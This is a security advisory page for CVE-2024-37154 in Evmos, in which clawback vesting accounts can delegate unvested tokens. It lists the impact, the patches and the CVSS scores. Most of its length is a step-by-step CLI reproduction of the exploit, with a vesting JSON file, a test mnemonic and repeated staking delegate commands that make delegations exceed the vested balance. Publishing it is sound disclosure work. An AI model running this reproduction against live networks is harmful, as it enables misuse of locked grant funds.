CVE-2024-37154

MEDIUM5.3EPSS 0.26%

Evmos allows unvested token delegations

Published: 6/6/2024Modified: 10/15/2024
Also known as:GHSA-7hrh-v6wp-53vwGO-2024-2904

Description

### Impact _What kind of vulnerability is it? Who is impacted?_ At the moment, users are able to delegate tokens that have not yet been vested. This affects employees and grantees who have funds managed via `ClawbackVestingAccount`. ### Patches _Has the problem been patched? What versions should users upgrade to?_ [The PR linked to this advisory](https://github.com/evmos/evmos-ghsa-7hrh-v6wp-53vw/pull/1) includes part of the fix. The remainder is in a [second advisory on the Cosmos SDK fork](https://github.com/evmos/cosmos-sdk/security/advisories/GHSA-wj6f-x5wv-8pqv). ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ There is no effective workaround to fix or remediate this issue without a new release. The best solution is to contain the information about this vulnerability to minimize the number of users who know about it and can thus exploit it. ### References _Are there any links users can visit to find out more?_ See the integration tests for more details on the exploit, or use the following to reproduce it on the CLI: 1. Download `vesting_setup.json` with the following contents: ``` { "start_time": 1679602272, "periods": [ { "coins": "100000000000000000000aevmos", "length_seconds": 10 }, { "coins": "100000000000000000000aevmos", "length_seconds": 259200000 } ] } ``` 2. Run the following CLI commands to reproduce the issue locally: ``` evmosd tx vesting create-clawback-vesting-account evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --vesting vesting_setup.json --from dev0 --fees 2000000000000000aevmos --home ~/.tmp-evmosd --yes # Verify that the balance contains zero locked tokens, 1000000000000000aevmos vested, 1000000000000000aevmos unvested evmosd q vesting balances evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --home ~/.tmp-evmosd evmosd keys add key1 --recover --home ~/.tmp-evmosd # Enter the following mnemonic skate tell option purity cattle poverty street act bone govern way various evmosd q staking validators --home ~/.tmp-evmosd | grep operator_address # Substitute the operator address from the previous query # Note that this delegates 70% of the user's available stake evmosd tx staking delegate <operator_address> 70000000000000000000aevmos --fees 5000000000000000aevmos --gas 300000 --from key1 --home ~/.tmp-evmosd --yes # Re-run the same command evmosd tx staking delegate <operator_address> 70000000000000000000aevmos --fees 5000000000000000aevmos --gas 300000 --from key1 --home ~/.tmp-evmosd --yes # Note that the total delegations now exceed the user's vested balance evmosd q staking delegations evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --home ~/.tmp-evmosd ```

Affected packages (31)

CVSS scores

SourceVersionSeverityVector
osvCVSS 3.1MEDIUM5.3CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

References (4)